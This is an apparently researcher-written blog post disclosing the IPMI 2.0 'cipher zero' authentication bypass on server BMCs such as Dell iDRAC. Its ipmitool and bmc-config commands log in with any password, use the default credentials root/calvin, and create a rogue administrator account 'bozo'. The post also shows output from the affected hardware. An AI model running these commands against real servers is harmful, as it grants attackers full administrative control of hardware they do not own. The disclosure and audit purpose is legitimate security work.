The Brain-Death in the IPMI Specification

The Infamous Cipher 0

It's hard to imagine someone thinking this up. The IPMI 2.0 Specification introduced cryptography into IPMI. Perhaps someone thought... well, cryptography is hard. So let's put in a way to completely sidestep not only cryptography, but authentication as well. This is the essence of cipher zero - it's really no cipher at all, or the un-cipher. It does require IPMI is turned on, as well as a valid account that can be authenticated to, you simply don't need the authentication. Vendors always have a default account, however, so that makes things a bit easier.

So let's see, to belabor the obvious, to execute an IPMI command, you can use good ol' bmc-config with the proper authentication:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

You know, that line of output is not good. How not good is "not good"? Well, let's try it again... this time with "FluffyWabbit" as the password:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn't some vendor hardcoded backdoor ;)

That said, so what? What's the worst that can happen? Ok... well, let's try this on my Dell iDRAC. It has an account called root, and a password that we don't know.

# this shouldn't work
$ ipmitool -H 10.0.0.1 -U root -P calvin chassis status
Activate Session command failed
Error: Unable to establish LAN session
Error sending Get Self Test command
# this really shouldn't either, but does.
$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P FluffyWabbit chassis status

Note you have to explicitly say you want version 2 (e.g. lanplus, in this case), as well as cipher zero ("-C 0".)

Still unimpressed, I know. Well, onwards. Let's create an IPMI account, give it a password, administrator rights, and enable it. I'll use both ipmitool and bmc-config; the former is great for illustrating settings, while the latter is very simple to understand the output.

# one account is there now
ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 admin true true true ADMINISTRATOR
$ cat bozo.txt
# add a user with administrative rights
Section User9
Username bozo
Password theclown
Enable_User Yes
Lan_Enable_IPMI_Msgs Yes
Lan_Enable_Link_Auth Yes
Lan_Enable_Restricted_to_Callback No
Lan_Privilege_Limit Administrator
SOL_Payload_Access Yes
Serial_Enable_IPMI_Msgs Yes
Serial_Enable_Link_Auth Yes
Serial_Enable_Restricted_to_Callback No
Serial_Privilege_Limit Administrator
EndSection
# et tu, bmc-config?
$ bmc-config -v -u root -p calvin -h 10.0.0.1 --commit -f bozo.txt
# voila
$ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 admin true true true ADMINISTRATOR
9 bozo true true true ADMINISTRATOR
# take the new account out for a test drive; no cheating with C0 this time
$ipmitool -H 10.0.0.1 -U bozo -P theclown user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 admin true true true ADMINISTRATOR
9 bozo true true true ADMINISTRATOR

Since IPMI administrative access grants you god powers on the server, it's a bit problematic that it's so easy to get admin rights.

I believe that IBM, as of the M2/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!) Dell told me that it was no longer on by default in the most recent version of iDRAC. I'm not sure who else still has this going on - but you might check your own boxes. Drop me a line if you hear your vendor has this on or off by default.

Disclaimer

Various versions of the IPMI utilities - including bmc-config - do not work correctly with cipher 0 and will fail; this misled me early on in testing my own boxes. The latest version of freeipmi seems to work on all the ones I've tested, at least; make sure you have downloaded the latest copy and try this to verify good ol' cipher 0 is still around. Most commands say they support cipher zero, but ensure you have the latest version, because bugs abound out there in the tools and/or in the BMCs. Here's a couple of more ways to see if this is enabled:

$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit lan print
$ ipmiutil lan -J 0 -N 10.0.0.1 -U admin -P FluffyBunny

Ipmiutil has a nice printing of the results - anything in the RMCP+ line (in red below) looks zero-ish is bad :) Cipher Privs refers to the maximum privilege the account can have using a given cipher suite.

$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P calvin lan print
Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback : MD2 MD5
: User : MD2 MD5
: Operator : MD2 MD5
: Admin : MD2 MD5
: OEM :
IP Address Source : Static Address
IP Address : 10.0.0.1
Subnet Mask : 255.255.255.0
MAC Address : 14:fe:b5:c7:df:28
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
Default Gateway IP : 192.168.0.1
Default Gateway MAC : 00:00:00:00:00:00
Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00
802.1q VLAN ID : Disabled
802.1q VLAN Priority : 0
RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14
Cipher Suite Priv Max : aaaaaaaaaaaaaaaa
: X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERATOR
: a=ADMIN
: O=OEM